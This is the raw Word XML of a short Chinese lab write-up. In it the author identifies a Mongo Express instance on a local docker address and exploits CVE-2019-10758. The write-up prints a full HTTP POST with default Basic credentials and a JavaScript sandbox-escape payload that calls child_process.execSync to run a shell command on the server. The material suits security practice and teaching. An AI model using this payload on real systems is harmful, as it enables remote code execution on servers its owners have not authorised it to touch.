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bookmarkStart w:id="0" w:name="实战题"/>
      <w:r>
        <w:t>实战题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="1046480"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21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04649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死活抓不到包，卡的要死//////////////////////</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2516505"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24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51664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rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>访问：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://172.17.0.1:8081/" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
        </w:rPr>
        <w:t>172.17.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:8081</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="3100070"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="28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1000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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="3397250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31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39759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</w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>打开页面发现MongoExpress指纹，搜索一下MongoExpress相关的漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
      <w:r>
        <w:t>CVE-2019-10758这个CVE漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5480685" cy="2320925"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1079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232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rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CVE-2019-10758</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5480685" cy="3375025"/>
            <wp:effectExtent l="0" t="0" r="5715" b="825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337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这不一样吗</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5483860" cy="2536825"/>
            <wp:effectExtent l="0" t="0" r="254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253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</w:pPr>
      <w:r>
        <w:t>是符合这个环境的banner信息的，直接网上查一手怎么复现信息，直接直接开打就好了，但是burp又抓不到包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>只能在用hackbar的post提交来试试：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>POST /checkValid HTTP/1.1
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>Host: 172.17.0.1:8081
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>Accept-Encoding: gzip, deflate
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>Accept: */*
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>Accept-Language: en
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
</w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>Connection: close
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>Authorization: Basic YWRtaW46cGFzcw==
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>Content-Type: application/x-www-form-urlencoded
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>Content-Length: 130
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>//直接post提交这一部分就好了</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/Success_py74on")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="3665220"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="34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66570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</w:pPr>
      <w:r>
        <w:t>回显是有效，这样应该就可以了。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0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splitPgBreakAndParaMark/>
    <w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="12"/>
  </w:compat>
  <w:docVars>
    <w:docVar w:name="commondata" w:val="eyJoZGlkIjoiOThlOTVlOTQ2NGVhYjliNWQ3MGJlMjE0NTcyMmNjNzkifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="1F9E3D1D"/>
    <w:rsid w:val="3C31211A"/>
    <w:rsid w:val="635B432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4F81BD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 Title"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="27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7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28">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="2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30">
    <w:name w:val="Definition Term"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="31"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="31">
    <w:name w:val="Definition"/>
    <w:basedOn w:val="1"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="32">
    <w:name w:val="Table Caption"/>
    <w:basedOn w:val="12"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="33">
    <w:name w:val="Image Caption"/>
    <w:basedOn w:val="12"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="34">
    <w:name w:val="Figure"/>
    <w:basedOn w:val="1"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="35">
    <w:name w:val="Captioned Figure"/>
    <w:basedOn w:val="34"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="36">
    <w:name w:val="Verbatim Char"/>
    <w:basedOn w:val="21"/>
    <w:link w:val="37"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="37">
    <w:name w:val="Source Code"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:wordWrap w:val="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="38">
    <w:name w:val="Section Number"/>
    <w:basedOn w:val="21"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="39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40">
    <w:name w:val="KeywordTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="41">
    <w:name w:val="DataTypeTok"/>
    <w:basedOn w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="902000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="42">
    <w:name w:val="DecValTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="40A070"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="43">
    <w:name w:val="BaseNTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="40A070"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="44">
    <w:name w:val="FloatTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="40A070"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="45">
    <w:name w:val="ConstantTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="880000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="46">
    <w:name w:val="CharTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="47">
    <w:name w:val="SpecialCharTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="48">
    <w:name w:val="StringTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="49">
    <w:name w:val="VerbatimStringTok"/>
    <w:basedOn w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="SpecialStringTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="BB6688"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="51">
    <w:name w:val="ImportTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="008000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="52">
    <w:name w:val="CommentTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="53">
    <w:name w:val="DocumentationTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="BA2121"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="54">
    <w:name w:val="AnnotationTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="55">
    <w:name w:val="CommentVarTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="56">
    <w:name w:val="OtherTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="57">
    <w:name w:val="FunctionTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="06287E"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="58">
    <w:name w:val="VariableTok"/>
    <w:basedOn w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="19177C"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="59">
    <w:name w:val="ControlFlowTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="60">
    <w:name w:val="OperatorTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="61">
    <w:name w:val="BuiltInTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="008000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="62">
    <w:name w:val="ExtensionTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="63">
    <w:name w:val="PreprocessorTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="BC7A00"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="64">
    <w:name w:val="AttributeTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="7D9029"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="65">
    <w:name w:val="RegionMarkerTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="66">
    <w:name w:val="InformationTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="67">
    <w:name w:val="WarningTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="68">
    <w:name w:val="AlertTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="69">
    <w:name w:val="ErrorTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="70">
    <w:name w:val="NormalTok"/>
    <w:basedOn w:val="36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174</Words>
  <Characters>675</Characters>
  <Lines>12</Lines>
  <Paragraphs>8</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>702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2024-05-22T00:57:00Z</dcterms:created>
  <dc:creator>py7h0n</dc:creator>
  <cp:lastModifiedBy>py7h0n</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-24T15:39:37Z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09B7931485BF44B89D13BF5BAD526284_12</vt:lpwstr>
  </property>
</Properties>
</file>